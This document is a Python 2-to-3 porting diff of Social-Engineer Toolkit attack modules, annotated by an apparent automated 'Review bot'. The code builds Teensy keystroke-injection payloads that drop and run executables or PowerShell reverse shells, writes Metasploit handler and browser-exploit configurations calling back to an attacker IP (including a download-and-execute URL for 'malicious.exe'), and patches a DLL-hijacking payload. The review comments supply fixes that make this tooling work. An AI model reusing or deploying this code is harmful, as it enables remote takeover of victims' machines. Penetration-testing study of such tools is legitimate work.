time.sleep(3)
fileopen = file(setdir + "/x86.powershell", "r")
fileopen = open(setdir + "/x86.powershell", "r")
# read in x amount of bytes
data_read = int(50)
output_variable = "#include <avr/pgmspace.h>\n"
output_variable = "#define __PROG_TYPES_COMPAT__\n#define PROGMEM\n#include <avr/pgmspace.h>\n"
counter = 0
while 1:
reading_encoded = fileopen.read(data_read).rstrip()
if reading_encoded == "": break
output_variable += 'prog_char RevShell_%s[] PROGMEM = "%s";\n' % (counter,reading_encoded)
if reading_encoded == "":
break
output_variable += "const char RevShell_%s[] PROGMEM = '%s';\n" % (
counter, reading_encoded)
counter = counter + 1
rev_counter = 0
output_variable += "PROGMEM const char *exploit[] = {\n"
output_variable += "const char exploit[] PROGMEM = {\n"
while rev_counter != counter:
output_variable+="RevShell_%s" % rev_counter
rev_counter = rev_counter +1
output_variable += "RevShell_%s" % rev_counter
rev_counter = rev_counter + 1
if rev_counter == counter:
output_variable+="};\n"
output_variable += "};\n"
if rev_counter != counter:
output_variable+=",\n"
output_variable += ",\n"
teensy = output_variable
# write the rest of the teensy code
teensy+=("""
teensy += ("""
char buffer[55];
int ledPin = 11;
@ -140,34 +142,36 @@ Keyboard.set_key1(0);
Keyboard.send_now();
}
""")
print "[*] Payload has been extracted. Copying file to %s/reports/teensy.pde" % (setdir)
print("[*] Payload has been extracted. Copying file to %s/reports/teensy.pde" % (setdir))
if not os.path.isdir(setdir + "/reports/"):
os.makedirs(setdir + "/reports/")
filewrite = file(setdir + "/reports/teensy.pde", "w")
filewrite = open(setdir + "/reports/teensy.pde", "w")
filewrite.write(teensy)
filewrite.close()
choice = yesno_prompt("0","Do you want to start a listener [yes/no]: ")
choice = yesno_prompt("0", "Do you want to start a listener [yes/no]: ")
if choice == "YES":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr=raw_input(setprompt(["6"], "IP address to connect back on"))
ipaddr = input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
if check_options("PORT=") != 0:
port = check_options("PORT=")
else:
port = raw_input("Enter the port to connect back on: ")
port = input("Enter the port to connect back on: ")
filewrite = file(setdir + "/metasploit.answers", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j" % (payload,ipaddr,port))
filewrite = open(setdir + "/metasploit.answers", "w")
filewrite.write(
"use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j" % (payload, ipaddr, port))
filewrite.close()
print "[*] Launching Metasploit...."
print("[*] Launching Metasploit....")
try:
child = pexpect.spawn("%smsfconsole -r %s/metasploit.answers\r\n\r\n" % (meta_path(),setdir))
child = pexpect.spawn(
"%smsfconsole -r %s/metasploit.answers\r\n\r\n" % (meta_path(), setdir))
child.interact()
except: pass
except:
pass
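Review bot: The generated Arduino source in the `open`-side (presumably new) version of the read loop switches the string literal to single quotes, `const char RevShell_%s[] PROGMEM = '%s';`, which in C/C++ is a multi-character constant rather than a string and will not compile as a char-array initializer; the old double-quoted form should be kept: `output_variable += 'const char RevShell_%s[] PROGMEM = "%s";\n' % (counter, reading_encoded)`. The companion change from `PROGMEM const char *exploit[]` to `const char exploit[] PROGMEM` turns an array of pointers into an array of chars, so initializing it with the `RevShell_N` array names will also be rejected unless the unchanged remainder of the sketch was adapted; `const char * const exploit[] PROGMEM = {` keeps the original type. Further down, the bare `except: pass` around `pexpect.spawn` / `child.interact()` hides every failure, including a missing `msfconsole`; `except pexpect.ExceptionPexpect as err:` followed by printing `err` keeps the best-effort behaviour without the silence. `fileopen` and the `filewrite` handles in this hunk are never closed; `with open(...)` blocks would make the lifetime explicit.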


@ -1,23 +1,30 @@
#!/usr/bin/python
import binascii,base64,sys,os,random,string,subprocess,socket
import binascii
import base64
import sys
import os
import random
import string
import subprocess
import socket
from src.core.setcore import *
from src.core.dictionaries import *
from src.core.menu.text import *
################################################################################################
##########################################################################
#
# BSIDES LV SDCARD to Teensy Creator
#
# by Josh Kelley (@winfang98)
# Dave Kennedy (@hackingdave)
#
################################################################################################
##########################################################################
################################################################################################
################################################################################################
##########################################################################
##########################################################################
# print main stuff for the application
print """
print("""
********************************************************************
BSIDES Las Vegas ---- SDCard to Teensy Creator
********************************************************************
@ -31,48 +38,55 @@ file that this tool outputs in order to successfully complete the task.
It works by reading natively off the SDCard into a buffer space thats then
written out through the keyboard.
"""
""")
# if we hit here we are good since msfvenom is installed
print """
print("""
.-. .-. . . .-. .-. .-. .-. .-. . . .-. .-. .-.
|.. |-| |\| |.. `-. | |- |( |\/| | | | )|-
`-' ` ' ' ` `-' `-' ' `-' ' ' ' ` `-' `-' `-'
enabled.\n"""
enabled.\n""")
# grab the path and filename from user
path = raw_input(setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
path = input(
setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if not os.path.isfile(path):
while 1:
print_warning("Filename not found, try again")
path = raw_input(setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if os.path.isfile(path): break
path = input(
setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if os.path.isfile(path):
break
print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
print_status("Converting the executable to a hexadecimal form to be converted later...")
print_warning(
"Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
print_status(
"Converting the executable to a hexadecimal form to be converted later...")
fileopen = file(path, "rb")
fileopen = open(path, "rb")
data = fileopen.read()
data = binascii.hexlify(data)
filewrite = file("converts.txt", "w")
filewrite = open("converts.txt", "w")
filewrite.write(data)
print "[*] File converted successfully. It has been expored in the working directory under 'converts.txt'. Copy this one file to the teensy SDCard."
print("[*] File converted successfully. It has been expored in the working directory under 'converts.txt'. Copy this one file to the teensy SDCard.")
output_variable = "/*\nTeensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)\nReading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile\n*/\n\n"
# this is used to write out the file
random_filename = generate_random_string(8,15) + ".txt"
random_filename = generate_random_string(8, 15) + ".txt"
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = unicode("$s=gc \"$HOME\\AppData\\Local\\Temp\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\%s.exe\",$b)" % (random_filename,random_filename))
# powershell command here, needs to be unicoded then base64 in order to
# use encodedcommand
powershell_command = str(
"$s=gc \"$HOME\\AppData\\Local\\Temp\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\%s.exe\",$b)" % (random_filename, random_filename))
########################################################################################################################################################################################################
##########################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
#
########################################################################################################################################################################################################
##########################################################################
# blank command will store our fixed unicode variable
blank_command = ""
@ -87,9 +101,9 @@ powershell_command = blank_command
powershell_command = base64.b64encode(powershell_command)
# vbs filename
vbs = generate_random_string(10,15) + ".vbs"
vbs = generate_random_string(10, 15) + ".vbs"
# .batch filename
bat = generate_random_string(10,15) + ".bat"
bat = generate_random_string(10, 15) + ".bat"
# write the rest of the teensy code
output_variable += ("""
@ -210,17 +224,18 @@ Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
""" % (random_filename,random_filename,powershell_command,vbs,bat,vbs,vbs,random_filename,bat,vbs))
""" % (random_filename, random_filename, powershell_command, vbs, bat, vbs, vbs, random_filename, bat, vbs))
# delete temporary file
subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" % (random_filename), shell=True).wait()
print "[*] Binary to Teensy file exported as teensy.pde"
subprocess.Popen("rm %s 1> /dev/null 2>/dev/null" %
(random_filename), shell=True).wait()
print("[*] Binary to Teensy file exported as teensy.pde")
# write the teensy.pde file out
filewrite = file("teensy.pde", "w")
filewrite = open("teensy.pde", "w")
# write the teensy.pde file out
filewrite.write(output_variable)
# close the file
filewrite.close()
print """
print("""
Instructions:
@ -230,5 +245,5 @@ some code marked above based on the Teensy and the Teensy++ based on how you sol
on.
Happy hacking.
"""
""")
return_continue()
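Review bot: Under Python 3 `binascii.hexlify(data)` returns bytes, so `filewrite = open("converts.txt", "w")` followed by `filewrite.write(data)` raises TypeError on a text-mode file; open it with `"wb"` and add `filewrite.close()` so the content is flushed before the "File converted successfully" message is printed. The same str/bytes split hits `powershell_command = str(...)` feeding `base64.b64encode(powershell_command)` in the later hunk, which requires bytes in Python 3; the null-byte widening loop between them is outside the visible lines, so where to encode depends on what it now produces. The comment block above that loop still describes the Python 2 `unicode()` behaviour and should be rewritten to say what the Python 3 code does, e.g. `# Python 3: str(...) no longer produces the wide form Python 2 unicode() gave; b64encode below needs bytes`. `fileopen` and `filewrite` are never closed in this hunk.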


@ -12,71 +12,73 @@ import datetime
from src.core.setcore import *
# pull metasploit path
msf_path=meta_path()
msf_path = meta_path()
# check operating system
operating_system = check_os()
now=datetime.datetime.today()
if operating_system != "windows": import pexpect
now = datetime.datetime.today()
if operating_system != "windows":
import pexpect
# check to see if setdir is created
if not os.path.isdir(setdir + "/reports/"):
os.makedirs(setdir + "/reports/")
definepath=os.getcwd()
definepath = os.getcwd()
# define if use apache or not
apache=0
apache = 0
# open set_config here
apache_check=file("/etc/setoolkit/set.config", "r").readlines()
apache_check = open("/etc/setoolkit/set.config", "r").readlines()
# loop this guy to search for the APACHE_SERVER config variable
for line in apache_check:
# strip \r\n
line=line.rstrip()
line = line.rstrip()
# if apache is turned on get things ready
match=re.search("APACHE_SERVER=ON",line)
match = re.search("APACHE_SERVER=ON", line)
# if its on lets get apache ready
if match:
for line2 in apache_check:
# set the apache path here
match2=re.search("APACHE_DIRECTORY=", line2)
match2 = re.search("APACHE_DIRECTORY=", line2)
if match2:
line2=line2.rstrip()
apache_path=line2.replace("APACHE_DIRECTORY=","")
apache=1
line2 = line2.rstrip()
apache_path = line2.replace("APACHE_DIRECTORY=", "")
apache = 1
# grab info from config file
fileopen=file(setdir + "/teensy", "r")
counter=0
payload_counter=0
fileopen = open(setdir + "/teensy", "r")
counter = 0
payload_counter = 0
for line in fileopen:
line=line.rstrip()
line = line.rstrip()
if counter == 0:
choice=str(line)
choice = str(line)
if counter == 1:
payload_counter=1
counter=counter+1
payload_counter = 1
counter = counter + 1
if choice != "14":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr=raw_input(setprompt(["6"], "IP address to connect back on"))
ipaddr = input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
if not os.path.isfile(setdir + "/teensy"):
print_error("FATAL:Something went wrong, the Teensy config file was not created.")
print_error(
"FATAL:Something went wrong, the Teensy config file was not created.")
exit_set()
def writefile(filename,now):
fileopen=file("src/teensy/%s" % filename, "r")
filewrite=file(setdir + "/reports/teensy_%s.pde" % (now), "w")
def writefile(filename, now):
fileopen = open("src/teensy/%s" % filename, "r")
filewrite = open(setdir + "/reports/teensy_%s.pde" % (now), "w")
for line in fileopen:
match=re.search("IPADDR",line)
match = re.search("IPADDR", line)
if match:
line=line.replace("IPADDR", ipaddr)
line = line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
@ -91,49 +93,52 @@ if choice == "1":
# wscript downloader
if choice == "2":
writefile("wscript.pde",now)
writefile("wscript.pde", now)
# powershell reverse
if choice == "3":
writefile("powershell_reverse.pde",now)
writefile("powershell_reverse.pde", now)
# beef injector
if choice == "4":
writefile("beef.pde",now)
writefile("beef.pde", now)
# java applet downloader
if choice == "5":
writefile("java_applet.pde",now)
writefile("java_applet.pde", now)
# gnome wget downloader
if choice == "6":
writefile("gnome_wget.pde",now)
writefile("gnome_wget.pde", now)
if choice == "13":
writefile("peensy.pde",now)
writefile("peensy.pde", now)
payload_counter = 0
# save our stuff here
print bcolors.BLUE + "\n[*] PDE file created. You can get it under '%s/reports/teensy_%s.pde' " % (setdir,now) +bcolors.ENDC
print bcolors.GREEN + '[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino' + bcolors.ENDC
print bcolors.RED + "\n[*] If your running into issues with VMWare Fusion and the start menu, uncheck\nthe 'Enable Key Mapping' under preferences in VMWare" + bcolors.ENDC
print(bcolors.BLUE + "\n[*] PDE file created. You can get it under '%s/reports/teensy_%s.pde' " % (setdir, now) + bcolors.ENDC)
print(bcolors.GREEN + '[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino' + bcolors.ENDC)
print(bcolors.RED + "\n[*] If your running into issues with VMWare Fusion and the start menu, uncheck\nthe 'Enable Key Mapping' under preferences in VMWare" + bcolors.ENDC)
pause = raw_input("Press {return} to continue.")
pause = input("Press {return} to continue.")
if payload_counter == 1:
if apache == 0:
subprocess.Popen("mkdir %s/web_clone/;cp %s/msf.exe %s/web_clone/x.exe 1> /dev/null 2> /dev/null" % (setdir,setdir,setdir), shell=True).wait()
subprocess.Popen("mkdir %s/web_clone/;cp %s/msf.exe %s/web_clone/x.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir, setdir), shell=True).wait()
if operating_system != "windows":
child=pexpect.spawn("python src/html/web_server.py")
child = pexpect.spawn("python src/html/web_server.py")
if apache == 1:
subprocess.Popen("cp %s/msf.exe %s/x.exe" % (setdir,apache_path), shell=True).wait()
subprocess.Popen("cp %s/msf.exe %s/x.exe" %
(setdir, apache_path), shell=True).wait()
if os.path.isfile(setdir + "/meta_config"):
print bcolors.BLUE + "\n[*] Launching MSF Listener..."
print bcolors.BLUE + "[*] This may take a few to load MSF..." + bcolors.ENDC
print(bcolors.BLUE + "\n[*] Launching MSF Listener...")
print(bcolors.BLUE + "[*] This may take a few to load MSF..." + bcolors.ENDC)
try:
if operating_system != "windows":
child1=pexpect.spawn("%smsfconsole -r %s/meta_config\r\n\r\n" % (msf_path,setdir))
child1 = pexpect.spawn(
"%smsfconsole -r %s/meta_config\r\n\r\n" % (msf_path, setdir))
child1.interact()
except:
if operating_system != "windows":
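Review bot: `child = pexpect.spawn("python src/html/web_server.py")` still hard-codes the `python` interpreter, which on systems of this period resolves to Python 2, while this commit moves the tree (including `web_server.py`, judging by its `http.server` imports elsewhere in the diff) to Python 3; spawning via the running interpreter keeps the child consistent: `child = pexpect.spawn("%s src/html/web_server.py" % sys.executable)` (assuming `sys` is imported above this hunk). The `mkdir`/`cp` invocations build shell strings from `setdir` and `apache_path`, the latter read from set.config; an argument list with `shell=False`, e.g. `subprocess.call(["cp", setdir + "/msf.exe", apache_path + "/x.exe"])`, removes the word-splitting and quoting hazard when a path contains spaces or shell metacharacters. `apache_check`, `fileopen` and the two handles in `writefile` are never closed; `writefile` itself continues past the end of its hunk, as does the bare `except:` at the end of the section.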


@ -6,156 +6,164 @@ from src.core.setcore import *
from src.core.menu.text import *
from src.core.dictionaries import *
definepath=os.getcwd()
definepath = os.getcwd()
me = mod_name()
port = ""
# see if multi_attack is being used and prep everything we need
multiattack="off"
webdav_enabled="off"
multiattack = "off"
webdav_enabled = "off"
if os.path.isfile(setdir + "/multi_payload"):
multiattack="on"
multiattack = "on"
# just need a simple filewrite to generate a file if webdav is enabled
# this is used for multi attack, it will write out file to program junk
# then a simple check will determine if webdav is enabled for the port
webdav_enabled="off"
webdav_write=file(setdir + "/webdav_enabled","w")
webdav_enabled = "off"
webdav_write = open(setdir + "/webdav_enabled", "w")
fileopen=file(setdir + "/multi_payload", "r")
fileopen = open(setdir + "/multi_payload", "r")
for line in fileopen:
match=re.search("MAIN=",line)
match = re.search("MAIN=", line)
if match:
port=line.replace("MAIN=","")
match2=re.search("MAINPAYLOAD=",line)
port = line.replace("MAIN=", "")
match2 = re.search("MAINPAYLOAD=", line)
if match2:
exploit=line.replace("MAINPAYLOAD=",line)
exploit = line.replace("MAINPAYLOAD=", line)
# grab metasploit path
metasploit_iframe="8080"
metasploit_iframe = "8080"
msf_path = meta_path()
configfile=file("/etc/setoolkit/set.config","r").readlines()
configfile = open("/etc/setoolkit/set.config", "r").readlines()
for line in configfile:
line=line.rstrip()
line = line.rstrip()
match4=re.search("METERPRETER_MULTI_SCRIPT=", line)
match4 = re.search("METERPRETER_MULTI_SCRIPT=", line)
if match4:
meterpreter_multi=line.replace("METERPRETER_MULTI_SCRIPT=", "")
meterpreter_multi = line.replace("METERPRETER_MULTI_SCRIPT=", "")
match5=re.search("METERPRETER_MULTI_COMMANDS=", line)
match5 = re.search("METERPRETER_MULTI_COMMANDS=", line)
if match5:
meterpreter_multi_command=line.replace("METERPRETER_MULTI_COMMANDS=", "")
meterpreter_multi_command=meterpreter_multi_command.replace(";", "\n")
meterpreter_multi_command = line.replace(
"METERPRETER_MULTI_COMMANDS=", "")
meterpreter_multi_command = meterpreter_multi_command.replace(
";", "\n")
match6=re.search("METASPLOIT_IFRAME_PORT=", line)
match6 = re.search("METASPLOIT_IFRAME_PORT=", line)
if match6:
metasploit_iframe=line.replace("METASPLOIT_IFRAME_PORT=", "")
metasploit_iframe = line.replace("METASPLOIT_IFRAME_PORT=", "")
match7=re.search("AUTO_MIGRATE=", line)
match7 = re.search("AUTO_MIGRATE=", line)
if match7:
auto_migrate=line.replace("AUTO_MIGRATE=", "")
auto_migrate = line.replace("AUTO_MIGRATE=", "")
# grab attack vector
attack_vector=""
attack_vector = ""
if os.path.isfile(setdir + "/attack_vector"):
fileopen=file(setdir + "/attack_vector")
fileopen = open(setdir + "/attack_vector")
for line in fileopen:
attack_vector=line.rstrip()
attack_vector = line.rstrip()
# open ipaddr
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input("Enter your ipaddress: ")
ipaddr = input("Enter your ipaddress: ")
update_options("IPADDR=" + ipaddr)
debug_msg(me,"printing 'text.browser_exploits_menu'",5)
show_browserexploit_menu = create_menu(browser_exploits_text, browser_exploits_menu)
exploit=raw_input(setprompt(["4"], ""))
debug_msg(me, "printing 'text.browser_exploits_menu'", 5)
show_browserexploit_menu = create_menu(
browser_exploits_text, browser_exploits_menu)
exploit = input(setprompt(["4"], ""))
if exploit == '':
print "\n Defaulting to IE CSS Import Use After Free exploit....."
exploit=("1")
print("\n Defaulting to IE CSS Import Use After Free exploit.....")
exploit = ("1")
# dictionary = ms_module
exploit = ms_module(exploit)
choice1=""
choice1 = ""
if multiattack == "off":
if exploit != "windows/browser/java_codebase_trust":
show_payload_menu_2 = create_menu(payload_menu_2_text, payload_menu_2)
choice1=raw_input(setprompt(["4"], ""))
choice1 = input(setprompt(["4"], ""))
if choice1 == '':choice1 ='2'
if choice1 == '':
choice1 = '2'
choice1 = ms_payload(choice1)
# if we are using the java exploit
if exploit == "exploit/windows/browser/java_codebase_trust" or exploit == "exploit/multi/browser/java_atomicreferencearray" or exploit == "exploit/multi/browser/java_verifier_field_access" or exploit == "exploit/multi/browser/java_jre17_exec" or exploit == "exploit/multi/browser/java_jre17_jmxbean" or exploit == "exploit/multi/browser/java_jre17_jmxbean_2":
print "[*] Selecting Java Meterpreter as payload since it is exploit specific."
print("[*] Selecting Java Meterpreter as payload since it is exploit specific.")
choice1 = ("java/meterpreter/reverse_tcp")
if multiattack == "off":
port=raw_input(setprompt(["4"], "Port to use for the reverse [443]"))
if port == "": port = "443"
port = input(setprompt(["4"], "Port to use for the reverse [443]"))
if port == "":
port = "443"
# check to see if we need to use the multi attack vector in java
if not os.path.isfile(setdir + "/multi_java"):
filewrite=file(setdir + "/meta_config", "w")
filewrite = open(setdir + "/meta_config", "w")
if os.path.isfile(setdir + "/multi_java"):
filewrite=file(setdir + "/meta_config", "a")
filewrite = open(setdir + "/meta_config", "a")
filewrite.write("use "+exploit+"\n")
filewrite.write("set PAYLOAD "+choice1+"\n")
filewrite.write("set LHOST "+ipaddr+"\n")
filewrite.write("use " + exploit + "\n")
filewrite.write("set PAYLOAD " + choice1 + "\n")
filewrite.write("set LHOST " + ipaddr + "\n")
filewrite.write("set LPORT %s" % (port) + "\n")
#filewrite.write("set ENCODING shikata_ga_nai"+"\n")
filewrite.write("set URIPATH /"+"\n")
filewrite.write("set URIPATH /" + "\n")
if choice1 == ("windows/download_exec"):
print "You selected the download and execute payload. Enter the URL to your executable."
print "Example would be http://172.16.32.129/malicious.exe"
set_url=raw_input(setprompt(["4"], "URL to the executable"))
print("You selected the download and execute payload. Enter the URL to your executable.")
print("Example would be http://172.16.32.129/malicious.exe")
set_url = input(setprompt(["4"], "URL to the executable"))
filewrite.write("set URL %s" % (set_url) + "\n")
# if it isn't used for webdav then redirect to metasploit iframe configuration setting
# if it isn't used for webdav then redirect to metasploit iframe
# configuration setting
if exploit != 'windows/browser/ms10_042_helpctr_xss_cmd_exec':
if exploit != 'windows/browser/ms10_046_shortcut_icon_dllloader':
if exploit != 'windows/browser/webdav_dll_hijacker':
filewrite.write("set SRVPORT %s" % (metasploit_iframe) + "\n")
# if webdav is needed for exploit, change base port
if exploit == 'windows/browser/ms10_042_helpctr_xss_cmd_exec':
filewrite.write("set SRVPORT 80"+"\n")
filewrite.write("set SRVPORT 80" + "\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
if exploit == 'windows/browser/ms10_046_shortcut_icon_dllloader':
filewrite.write("set SRVPORT 80"+"\n")
filewrite.write("set SRVPORT 80" + "\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
if exploit == 'windows/browser/webdav_dll_hijacker':
filewrite.write("set SRVPORT 80"+"\n")
filewrite.write("set SRVPORT 80" + "\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
extension=raw_input(setprompt(["4"], "Extension types for this exploit [all]"))
extension = input(
setprompt(["4"], "Extension types for this exploit [all]"))
if extension == '':
filewrite.write("set EXTENSIONS p7c wab ppt pptx zip vsd docx grp snag wbcat eml odp pot ppsx htm html"+"\n")
filewrite.write(
"set EXTENSIONS p7c wab ppt pptx zip vsd docx grp snag wbcat eml odp pot ppsx htm html" + "\n")
else:
filewrite.write("set EXTENSIONS %s" % (extension) + "\n")
filewrite.write("set ExitOnSession false\n")
# if we are using multiple meterpreter multiscripts
if meterpreter_multi == "ON":
multiwrite=file(setdir + "/multi_meter.file", "w")
multiwrite = open(setdir + "/multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (setdir))
filewrite.write(
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (setdir))
multiwrite.close()
# auto migration
@ -172,6 +180,6 @@ if webdav_enabled == "on":
# this basically sets a flag we need to make some custom changes in web_server.py to get
# the docbase exploit to work properly
if exploit == ("windows/browser/java_docbase_bof"):
filewrite=file(setdir + "/docbase.file", "w")
filewrite = open(setdir + "/docbase.file", "w")
filewrite.write("DOCBASE=ON")
filewrite.close()
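Review bot: `exploit = line.replace("MAINPAYLOAD=", line)` replaces the marker with the entire line instead of removing it, so `exploit` ends up as the line with itself spliced in; matching the `MAIN=` branch just above, the intent is presumably `exploit = line.replace("MAINPAYLOAD=", "").rstrip()`. The `port = line.replace("MAIN=", "")` branch keeps the trailing newline, which then lands in `set LPORT %s\n` as a blank line in the resource file; `.rstrip()` there fixes that too. `meterpreter_multi` and `auto_migrate` are only bound when the corresponding set.config keys are present, so the later `if meterpreter_multi == "ON":` raises NameError on a config lacking that line; initialise both to `""` next to `metasploit_iframe = "8080"`. The file is a flat script and the final hunk (`if webdav_enabled == "on":`) starts before the visible lines.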


@ -13,81 +13,85 @@ import binascii
from src.core.menu.text import dll_hijacker_text
from src.core.setcore import *
definepath=os.getcwd()
definepath = os.getcwd()
try:
import zipfile
except ImportError, error:
except ImportError as error:
log(error)
print "Module 'zipfile' was not detected, please download and install the python zipfile module"
print("Module 'zipfile' was not detected, please download and install the python zipfile module")
exit_set()
print dll_hijacker_text
print(dll_hijacker_text)
# open the repository, its simple name,extension,dll
fileopen=file("src/webattack/dll_hijacking/repository", "r")
fileopen = open(setdir + "src/webattack/dll_hijacking/repository", "r")
# set base counter for our pick
print " Enter the choice of the file extension you want to attack:\n"
counter=1
print(" Enter the choice of the file extension you want to attack:\n")
counter = 1
for line in fileopen:
line=line.split(",")
print " " + str(counter)+". "+line[0]
counter=counter+1
line = line.split(",")
print(" " + str(counter) + ". " + line[0])
counter = counter + 1
print "\n"
choice=raw_input(setprompt(["2","15"], ""))
print("\n")
choice = input(setprompt(["2", "15"], ""))
if choice == 'exit':
exit_set()
if choice == "": choice="1"
if choice == "":
choice = "1"
choice=int(choice)
choice = int(choice)
# reset the counter and get our payload ready and selected
counter=1
fileopen=file("src/webattack/dll_hijacking/repository", "r")
counter = 1
fileopen = open(setdir + "src/webattack/dll_hijacking/repository", "r")
for line in fileopen:
line=line.split(",")
line = line.split(",")
if int(counter) == int(choice):
name=line[0].rstrip()
extension="."+line[1].rstrip()
dll=line[2].rstrip()
counter=counter+1
name = line[0].rstrip()
extension = "." + line[1].rstrip()
dll = line[2].rstrip()
counter = counter + 1
print "\n [*] You have selected the file extension of %s and vulnerable dll of %s" % (extension,dll)
print("\n [*] You have selected the file extension of %s and vulnerable dll of %s" % (extension, dll))
# prep the directories
subprocess.Popen("mkdir " + setdir + "/dll", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
filename1=raw_input(setprompt(["2","15"], "Enter the filename for the attack (example:openthis) [openthis]"))
if filename1 == "": filename1 = "openthis"
subprocess.Popen("mkdir " + setdir + "/dll", stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True).wait()
filename1 = input(setprompt(
["2", "15"], "Enter the filename for the attack (example:openthis) [openthis]"))
if filename1 == "":
filename1 = "openthis"
# move the files there using the correct extension and file type
filewrite=file(setdir + "/dll/%s%s" % (filename1,extension),"w")
filewrite = open(setdir + "/dll/%s%s" % (filename1, extension), "w")
filewrite.write("EMPTY")
filewrite.close()
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr=raw_input(setprompt(["2","15"], "IP address to connect back on"))
ipaddr = input(setprompt(["2", "15"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
# replace ipaddress with one that we need for reverse connection back
fileopen=open("src/webattack/dll_hijacking/hijacking.dll" , "rb")
data=fileopen.read()
fileopen = open(setdir + "src/webattack/dll_hijacking/hijacking.dll", "rb")
data = fileopen.read()
filewrite=open(setdir + "/dll/%s" % (dll), "wb")
filewrite = open(setdir + "/dll/%s" % (dll), "wb")
host=int(len(ipaddr)+1) * "X"
host = int(len(ipaddr) + 1) * "X"
filewrite.write(data.replace(str(host), ipaddr+"\x00", 1))
filewrite.write(data.replace(str(host), ipaddr + "\x00", 1))
filewrite.close()
# ask what they want to use
print """
print("""
Do you want to use a zipfile or rar file. Problem with zip
is they will have to extract the files first, you can't just
open the file from inside the zip. Rar does not have this
@ -95,12 +99,13 @@ restriction and is more reliable
1. Rar File
2. Zip File
"""
""")
# flag a choice
choice=raw_input(setprompt(["2","15"], "[rar]"))
choice = input(setprompt(["2", "15"], "[rar]"))
# if default was selected just do rar
if choice == "": choice = "1"
if choice == "":
choice = "1"
# if its not a rar file
if choice != "1":
# if its not a zipfile, you messed up
@ -112,22 +117,23 @@ if choice != "1":
if choice == "1":
# basic counter
counter=0
counter = 0
# look for rar in default directories
rar_check = subprocess.Popen("rar",shell=True, stdout=subprocess.PIPE)
rar_check = subprocess.Popen("rar", shell=True, stdout=subprocess.PIPE)
# comunicate with the process
stdout_value = rar_check.communicate()[0]
# do a search to see if rar is present
match=re.search("Add files to archive", stdout_value)
match = re.search("Add files to archive", stdout_value)
# we get a hit?
if match:
subprocess.Popen("cd %s/dll;rar a %s/template.rar * 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
counter=1
subprocess.Popen("cd %s/dll;rar a %s/template.rar * 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
counter = 1
# if we didnt find rar
if counter == 0:
print "[!] Error, rar was not detected. Please download rar and place it in your /usr/bin or /usr/local/bin directory."
print "[*] Defaulting to zipfile for the attack vector. Sorry boss."
print("[!] Error, rar was not detected. Please download rar and place it in your /usr/bin or /usr/local/bin directory.")
print("[*] Defaulting to zipfile for the attack vector. Sorry boss.")
choice = "2"
# if its a zipfile zip the badboy up
@ -139,4 +145,5 @@ if choice == "2":
file.close()
if os.path.isfile(setdir + "/msf.exe"):
subprocess.Popen("cp %s/msf.exe %s/src/html/" % (setdir, definepath), shell=True).wait()
subprocess.Popen("cp %s/msf.exe %s/src/html/" %
(setdir, definepath), shell=True).wait()
